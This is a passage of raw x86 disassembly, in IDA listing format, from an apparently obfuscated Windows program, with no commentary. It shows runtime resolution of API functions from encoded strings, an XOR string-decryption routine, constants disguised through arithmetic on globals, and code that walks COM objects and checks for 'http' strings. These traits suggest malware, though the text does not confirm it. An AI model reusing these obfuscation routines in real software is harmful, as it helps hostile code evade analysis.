call dword ptr ds:1000D000h
lea eax, [ebp-24h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:1000E0D4h
mov ebx, ds:10012190h
sub ebx, 3
cmp eax, ebx
jnz short loc_41EDE5
cmp dword ptr ds:10011790h[edi*4], 0
jz short loc_41EE2E
mov ebx, ds:100121C0h
sub ebx, 3
mov ds:1000E630h[edi*4], ebx
jmp short loc_41EE2E
; ---------------------------------------------------------------------------
loc_41EDE5: ; CODE XREF: .data:0041EDC7�j
cmp dword ptr ds:10011790h[edi*4], 0
jnz short loc_41EE2E
mov ds:1000E630h[edi*4], edi
lea eax, [ebp-28h]
push eax
movsx eax, word ptr ds:10012194h
push eax
lea ebx, ds:1000E630h[edi*4]
push ebx
push 100024C6h
mov ebx, ds:10012134h
add ebx, ds:10012178h
sub ebx, 6
push ebx
push 0
call dword ptr ds:10011B90h
mov ds:10011790h[edi*4], eax
loc_41EE2E: ; CODE XREF: .data:0041ED75�j
; .data:0041ED95�j ...
inc edi
loc_41EE2F: ; CODE XREF: .data:0041ECD2�j
cmp edi, 5Ah
jbe loc_41ECD7
movsx eax, word ptr ds:100120B0h
sub eax, 8
push eax
call dword ptr ds:10011630h
pop ecx
jmp loc_41ECCD
; ---------------------------------------------------------------------------
db 5Fh
dd 0C2C95B5Eh, 1B80004h, 0C2800040h
db 18h, 0
; =============== S U B R O U T I N E =======================================
sub_41EE5E proc near ; CODE XREF: .data:00423023�p
push edi
push 100134A5h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121DCh, eax
test eax, eax
jnz short loc_41EE91
push 10013497h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121DCh, eax
loc_41EE91: ; CODE XREF: sub_41EE5E+1A�j
push 10013484h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1001160Ch, eax
push 10013471h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10010648h, eax
push 1001345Fh
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000E614h, eax
push 1001344Eh
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000F224h, eax
push 1001343Ah
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000C050h, eax
push 10013429h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000D010h, eax
push 10013412h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000E5F0h, eax
push 10013403h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000F368h, eax
push 100133F6h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000C004h, eax
push 100133E4h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011628h, eax
push 100133D3h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011650h, eax
push 100133C1h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011BA4h, eax
push 100133B2h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000F220h, eax
push 100133A5h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011620h, eax
push 10013396h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011640h, eax
push 10013388h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000C040h, eax
push 10013376h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000E0DCh, eax
push 10013366h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000C014h, eax
push 1001335Ah
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000EA40h, eax
push 1001334Eh
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011604h, eax
push 1001333Ch
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000E5F8h, eax
push 1001332Ah
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011654h, eax
push 1001331Ch
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011658h, eax
push 10013308h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1001177Ch, eax
push 100132F7h
call sub_4228CE
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:10011638h, eax
push 100132E1h
call sub_4228CE
add esp, 68h
push eax
push dword ptr ds:100121DCh
call dword ptr ds:1000E1F8h
mov ds:1000C048h, eax
pop edi
retn
sub_41EE5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F16E proc near ; CODE XREF: .data:loc_41C666�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, ds:10012190h
add eax, ds:100120F8h
sub eax, 5
push eax
push 0
push 20h
push 0
call dword ptr ds:1000EA44h
lea eax, [ebp+var_10]
push eax
call dword ptr ds:1000F25Ch
mov eax, ds:100120A0h
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_8]
mov ebx, ds:1001209Ch
add ebx, 34h
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_A]
mov ebx, ds:10012158h
add ebx, 18h
add ebx, ds:10012188h
imul ecx, ebx
mov ebx, ds:10012134h
add ebx, 39h
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_E]
mov ebx, ds:100120A0h
add ebx, 1Ah
imul ecx, ebx
mov ebx, ds:100120D4h
add ebx, 16h
add ebx, ds:100120C0h
imul ecx, ebx
movsx ebx, word ptr ds:10012100h
movsx esi, word ptr ds:10012194h
lea ebx, [ebx+esi+33h]
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_10]
movsx ebx, word ptr ds:10012154h
add ebx, 4
imul ecx, ebx
mov ebx, ds:10012094h
add ebx, 16h
add ebx, ds:100120A4h
imul ecx, ebx
movsx ebx, word ptr ds:1001219Ch
lea eax, [ebx+eax+0Eh]
imul ecx, eax
mov eax, ds:100120CCh
add eax, 36h
movsx ebx, word ptr ds:10012150h
add eax, ebx
imul ecx, eax
mov eax, edx
add eax, ecx
mov ds:1000C024h, eax
mov eax, ds:10012108h
inc eax
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_41DEB9
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_41F16E endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 18C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F2AD proc near ; CODE XREF: .data:00422784�p
var_100B = byte ptr -100Bh
var_1005 = byte ptr -1005h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_424F4D
push ebx
push esi
push edi
push 100132CFh
call sub_4228CE
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call dword ptr ds:10011638h
mov edi, eax
or edi, edi
jnz short loc_41F2DF
mov edi, [ebp+arg_0]
loc_41F2DF: ; CODE XREF: sub_41F2AD+2D�j
push 100132B9h
call sub_4228CE
pop ecx
push 0
push eax
push 0
push edi
call dword ptr ds:10011638h
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call dword ptr ds:1000C014h
movsx eax, word ptr ds:100120D0h
cmp [ebp+eax+var_FFF], 20h
jnz short loc_41F33A
mov eax, ds:100121ACh
movsx edx, word ptr ds:100120BCh
add eax, edx
cmp [ebp+eax+var_100B], 20h
jz loc_41F3DF
loc_41F33A: ; CODE XREF: sub_41F2AD+6F�j
mov eax, ds:1001217Ch
cmp [ebp+eax+var_1005], 68h
jnz short loc_41F364
movsx eax, word ptr ds:10012128h
mov edx, ds:10012158h
lea eax, [eax+edx+1]
cmp [ebp+eax+var_FFF], 74h
jz short loc_41F3DF
loc_41F364: ; CODE XREF: sub_41F2AD+9A�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_41F36D: ; CODE XREF: sub_41F2AD+C5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F36D
mov ebx, ds:1001212Ch
add ebx, 8
movsx edx, word ptr ds:10012128h
add ebx, edx
cmp eax, ebx
jb short loc_41F3DF
push 100132B4h
call sub_4228CE
movsx esi, word ptr ds:10012114h
add esi, 2
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_41DB51
add esp, 10h
movsx ebx, word ptr ds:10012150h
add ebx, 0FFFAh
cmp eax, ebx
jnz short loc_41F3DF
push 100132AEh
call sub_4228CE
pop ecx
push eax
mov esi, ds:100120C4h
sub esi, 4
push esi
push 0Ch
push edi
call dword ptr ds:1000C014h
loc_41F3DF: ; CODE XREF: sub_41F2AD+87�j
; sub_41F2AD+B5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41F2AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F3E4 proc near ; CODE XREF: sub_41BB8D+1B�p
; sub_41DCB0+1A4�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:100121D0h, 0
jnz short loc_41F40C
push 10011BC0h
call dword ptr ds:1000D008h
mov dword ptr ds:100121D0h, 1
loc_41F40C: ; CODE XREF: sub_41F3E4+11�j
mov esi, ds:10012134h
add esi, 3
movsx ebx, word ptr ds:100121A8h
add esi, ebx
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
mov edx, ds:10012158h
add edx, 2
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:100120A4h
add edx, 4
cmp eax, edx
jz loc_41F4EF
push 10011BC0h
call dword ptr ds:1001165Ch
movsx eax, word ptr ds:10012154h
sub eax, 2
mov [ebp+var_2], ax
jmp short loc_41F49C
; ---------------------------------------------------------------------------
loc_41F472: ; CODE XREF: sub_41F3E4+C2�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, ds:100120ECh
add edx, ds:100121B0h
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_41F49C: ; CODE XREF: sub_41F3E4+8C�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_41F472
movsx eax, word ptr ds:100120D8h
movsx edx, word ptr ds:1001216Ch
add eax, edx
sub eax, 9
movsx edx, word ptr ds:10012148h
sub edx, 3
mov [edi+eax], dl
movsx eax, word ptr ds:10012150h
add eax, ds:100120FCh
sub eax, 0Ah
mov edx, ds:100121B8h
sub edx, 3
mov [edi+eax], dl
push 10011BC0h
call dword ptr ds:1001064Ch
loc_41F4EF: ; CODE XREF: sub_41F3E4+6D�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_41F3E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F4F7 proc near ; CODE XREF: .data:004229D5�p
var_71F0E = byte ptr -71F0Eh
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50EA3 = byte ptr -50EA3h
var_50EA0 = dword ptr -50EA0h
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_424F4D
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call dword ptr ds:1000C038h
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
mov eax, ds:1001215Ch
movsx edx, word ptr ds:1001216Ch
add eax, edx
sub eax, 8
push eax
push [ebp+arg_0]
call dword ptr ds:1000F254h
mov ebx, eax
movsx eax, word ptr ds:100120E0h
cmp ebx, eax
jnz loc_4202B9
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push 1001397Ch
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012150h
sub eax, 5
cmp ebx, eax
jnz loc_4202B9
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, ds:10012124h
dec eax
cmp ebx, eax
jnz loc_4202AD
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_41ADCD
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call dword ptr ds:10011BA0h
cmp [ebp+var_40E57], 68h
jnz short loc_41F604
cmp [ebp+var_40E56], 74h
jnz short loc_41F604
cmp [ebp+var_40E55], 74h
jnz short loc_41F604
cmp [ebp+var_40E54], 70h
jz short loc_41F609
loc_41F604: ; CODE XREF: sub_41F4F7+F0�j
; sub_41F4F7+F9�j ...
jmp loc_4202AD
; ---------------------------------------------------------------------------
loc_41F609: ; CODE XREF: sub_41F4F7+10B�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
movsx eax, word ptr ds:10012114h
sub eax, 2
cmp ebx, eax
jz short loc_41F636
and [ebp+var_30E4C], 0
loc_41F636: ; CODE XREF: sub_41F4F7+136�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, ds:10012138h
movsx edx, word ptr ds:10012150h
add eax, edx
sub eax, 0Dh
cmp ebx, eax
jnz loc_4202AD
lea eax, [ebp+var_40E6C]
push eax
push 100138FCh
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100121C8h
sub eax, 2
cmp ebx, eax
jnz loc_4202A1
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, ds:100120C4h
sub eax, 4
cmp ebx, eax
jnz loc_420295
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:100121CCh
add eax, ds:1001214Ch
sub eax, 0Ah
cmp ebx, eax
jnz loc_420289
mov eax, ds:10012118h
add eax, ds:100121CCh
sub eax, 4
neg eax
mov [ebp+var_40E5C], eax
push 1001329Ch
call sub_41F3E4
push eax
call dword ptr ds:1000C044h
mov [ebp+var_30E44], eax
push 1001328Ch
call sub_41F3E4
add esp, 8
push eax
call dword ptr ds:1000C044h
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_424F6D
loc_41F73C: ; CODE XREF: sub_41F4F7+D66�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
movsx eax, word ptr ds:10012194h
add eax, ds:100120CCh
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_41F7AF
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:100120E4h
movsx edx, word ptr ds:10012148h
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_42024B
push 1001327Dh
call sub_4228CE
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000C020h
add esp, 0Ch
jmp loc_41F8D5
; ---------------------------------------------------------------------------
loc_41F7AF: ; CODE XREF: sub_41F4F7+268�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push 1001394Ch
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012150h
movsx edx, word ptr ds:10012110h
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_42024B
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, ds:100121B8h
add eax, ds:10012138h
sub eax, 0Bh
cmp ebx, eax
jz short loc_41F857
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_42024B
; ---------------------------------------------------------------------------
loc_41F857: ; CODE XREF: sub_41F4F7+34D�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
movsx eax, word ptr ds:10012194h
movsx edx, word ptr ds:100120B0h
add eax, edx
sub eax, 8
cmp ebx, eax
jz short loc_41F8A0
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_42024B
; ---------------------------------------------------------------------------
loc_41F8A0: ; CODE XREF: sub_41F4F7+38A�j
push 1001326Eh
call sub_4228CE
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
add esp, 18h
loc_41F8D5: ; CODE XREF: sub_41F4F7+2B3�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:100120B8h
add eax, ds:1001215Ch
sub eax, 8
cmp ebx, eax
jnz loc_42024B
movsx eax, word ptr ds:100120C8h
sub eax, 7
mov [ebp+var_30E50], eax
jmp loc_420239
; ---------------------------------------------------------------------------
loc_41F915: ; CODE XREF: sub_41F4F7+D4E�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word ptr ds:100120B0h
mov edx, ds:10012198h
sub edx, 8
mov [ebp+eax+var_50EA3], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:10012108h
add eax, ds:10012094h
sub eax, 6
cmp ebx, eax
jnz loc_420233
push 10013260h
call sub_4228CE
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push 1001390Ch
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100121A0h
sub eax, 6
cmp ebx, eax
jnz loc_41FEB7
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov eax, ds:100120A4h
add eax, ds:100120F0h
sub eax, 6
cmp ebx, eax
jnz loc_41FEAB
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_41ADCD
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call dword ptr ds:10011BA0h
mov eax, ds:1001214Ch
movsx edx, word ptr ds:100121A8h
add eax, edx
sub eax, 6
mov [ebp+var_40E9C], eax
jmp short loc_41FABF
; ---------------------------------------------------------------------------
loc_41FA6B: ; CODE XREF: sub_41F4F7+5D4�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
mov edx, ds:100120A0h
add edx, 6
movsx ecx, word ptr ds:10012148h
add edx, ecx
cmp eax, edx
jz short loc_41FAA2
mov edx, ds:10012108h
add edx, 0Ah
add edx, ds:100121A4h
cmp eax, edx
jnz short loc_41FAB9
loc_41FAA2: ; CODE XREF: sub_41F4F7+596�j
mov eax, [ebp+var_40E9C]
movsx edx, word ptr ds:100120F4h
sub edx, 9
mov [ebp+eax+var_60E9F], dl
loc_41FAB9: ; CODE XREF: sub_41F4F7+5A9�j
inc [ebp+var_40E9C]
loc_41FABF: ; CODE XREF: sub_41F4F7+572�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_41FA6B
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_424F6D
mov eax, ds:100120F0h
add eax, ds:10012130h
sub eax, 4
mov [ebp+var_40E9C], eax
loc_41FAF4: ; CODE XREF: sub_41F4F7+737�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_41FB04: ; CODE XREF: sub_41F4F7+612�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FB04
mov [ebp+var_60EA8], eax
mov edx, ds:100120FCh
sub edx, 7
cmp eax, edx
jz short loc_41FB34
mov edx, ds:10012094h
add edx, 0BFh
add edx, ds:100120A8h
cmp eax, edx
jbe short loc_41FB39
loc_41FB34: ; CODE XREF: sub_41F4F7+625�j
jmp loc_41FC0B
; ---------------------------------------------------------------------------
loc_41FB39: ; CODE XREF: sub_41F4F7+63B�j
mov eax, ds:100120ECh
add eax, ds:10012098h
sub eax, 0Ch
mov [ebp+var_60EA4], eax
jmp short loc_41FB7C
; ---------------------------------------------------------------------------
loc_41FB4F: ; CODE XREF: sub_41F4F7+691�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
mov edx, ds:100121C4h
add edx, 19h
add edx, ds:100120E4h
cmp eax, edx
jnz short loc_41FB8A
inc [ebp+var_60EA4]
loc_41FB7C: ; CODE XREF: sub_41F4F7+656�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_41FB4F
loc_41FB8A: ; CODE XREF: sub_41F4F7+67D�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_41FC0B
push dword ptr ds:100120CCh
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_41DB51
add esp, 0Ch
mov [ebp+var_60EDC], eax
movsx eax, word ptr ds:10012128h
add eax, 0FFFFh
cmp [ebp+var_60EDC], eax
jnz short loc_41FC0B
push 1001325Bh
call sub_4228CE
push eax
lea edi, [ebp+var_50E9B]
push edi
call dword ptr ds:1000C020h
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call dword ptr ds:1000C020h
add esp, 14h
loc_41FC0B: ; CODE XREF: sub_41F4F7:loc_41FB34�j
; sub_41F4F7+69F�j ...
mov eax, [ebp+var_60EA8]
mov edx, ds:100120FCh
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_41FAF4
movsx eax, word ptr ds:10012100h
add eax, ds:100121B4h
sub eax, 0Ah
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_41FC53: ; CODE XREF: sub_41F4F7+761�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FC53
mov [ebp+var_60EA8], eax
mov eax, ds:100121C8h
add eax, ds:10012164h
sub eax, 2
mov [ebp+var_40E9C], eax
jmp loc_41FE83
; ---------------------------------------------------------------------------
loc_41FC79: ; CODE XREF: sub_41F4F7+998�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:1001217Ch
add edx, 1Ah
cmp eax, edx
jz short loc_41FC9B
and [ebp+var_60EAC], 0
loc_41FC9B: ; CODE XREF: sub_41F4F7+79B�j
mov eax, ds:1001215Ch
mov edx, [ebp+var_40E9C]
movzx edx, [ebp+edx+var_50E9B]
lea eax, [eax+eax+18h]
cmp edx, eax
jnz loc_41FE2E
mov eax, ds:10012130h
add eax, ds:100120E4h
sub eax, 2
cmp [ebp+var_40E9C], eax
jbe loc_41FD8A
mov eax, [ebp+var_40E9C]
movsx edx, word ptr ds:100120B0h
movsx ecx, word ptr ds:10012170h
add edx, ecx
sub edx, 0Fh
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:100120FCh
add edx, 13h
movsx ecx, word ptr ds:100120DCh
add edx, ecx
cmp eax, edx
jle short loc_41FD2C
mov edx, ds:10012140h
add edx, 24h
add edx, ds:100121ACh
cmp eax, edx
jl short loc_41FD80
loc_41FD2C: ; CODE XREF: sub_41F4F7+820�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:1001217Ch
add edx, 30h
movsx ecx, word ptr ds:10012148h
add edx, ecx
cmp eax, edx
jle short loc_41FD5E
movsx edx, word ptr ds:100121BCh
mov ecx, ds:100121B0h
lea edx, [edx+ecx+3Bh]
cmp eax, edx
jl short loc_41FD80
loc_41FD5E: ; CODE XREF: sub_41F4F7+850�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100121C0h
add edx, 77h
cmp eax, edx
jle short loc_41FD8A
movsx edx, word ptr ds:10012148h
add edx, 7Ch
cmp eax, edx
jge short loc_41FD8A
loc_41FD80: ; CODE XREF: sub_41F4F7+833�j
; sub_41F4F7+865�j
mov [ebp+var_60EAC], 1
loc_41FD8A: ; CODE XREF: sub_41F4F7+7D7�j
; sub_41F4F7+879�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_41FE2E
mov eax, [ebp+var_40E9C]
mov edx, ds:10012104h
sub edx, 2
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
